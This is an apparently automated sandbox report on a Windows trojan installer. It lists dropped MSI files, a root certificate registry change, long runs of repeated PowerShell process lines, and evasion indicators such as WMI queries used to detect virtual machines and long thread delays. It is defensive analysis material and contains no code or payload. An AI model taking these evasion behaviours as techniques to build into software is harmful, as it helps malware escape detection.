          Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr
          Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb_ source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr
          Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0036C230 push ecx; mov dword ptr [esp], ecx0_2_0036C231
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0052097E push ecx; ret 0_2_00520991
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0044CD60 push ecx; mov dword ptr [esp], 3F800000h0_2_0044CE96
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00481960 SHGetFolderPathW,GetSystemDirectoryW,GetWindowsDirectoryW,GetWindowsDirectoryW,GetModuleFileNameW,SHGetSpecialFolderLocation,__Init_thread_footer,LoadLibraryW,GetProcAddress,SHGetPathFromIDListW,SHGetMalloc,0_2_00481960
          Source: shi6220.tmp.0.drStatic PE information: 0x72F9C735 [Sun Feb 16 01:34:45 2031 UTC]
          Source: shi6220.tmp.0.drStatic PE information: section name: .wpp_sf
          Source: shi6220.tmp.0.drStatic PE information: section name: .didat
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile created: C:\Users\user\AppData\Local\Temp\MSI634A.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6B3B.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6AAC.tmpJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile created: C:\Users\user\AppData\Local\Temp\shi6220.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6B9A.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI69F0.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6D80.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6AFB.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6B3B.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6AAC.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6B9A.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI69F0.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6D80.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6AFB.tmpJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB BlobJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep count: 3335 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep count: 1481 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8096Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8096Thread sleep time: -590579s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590579Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3335Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1481Jump to behavior
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6B3B.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6AAC.tmpJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi6220.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6AFB.tmpJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590579Jump to behavior
          Source: powershell.exe, 00000006.00000003.382712496.000000000619A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: powershell.exe, 00000006.00000003.382712496.000000000619A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-VlB
          Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00506840 GetCurrentProcess,GetProcessAffinityMask,GetSystemInfo,GetModuleHandleA,GetProcAddress,GlobalMemoryStatus,0_2_00506840
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_004927F0 ReadFile,FindFirstFileW,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_2_004927F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0046C9A0 FindFirstFileW,GetLastError,FindClose,0_2_0046C9A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0046C040 _wcsrchr,FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,0_2_0046C040
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0046E270 FindFirstFileW,FindClose,0_2_0046E270
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_004B08C0 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_004B08C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0047AB40 FindFirstFileW,FindClose,FindClose,0_2_0047AB40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0049CDD0 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_0049CDD0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_003711B0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,PathIsUNCW,0_2_003711B0
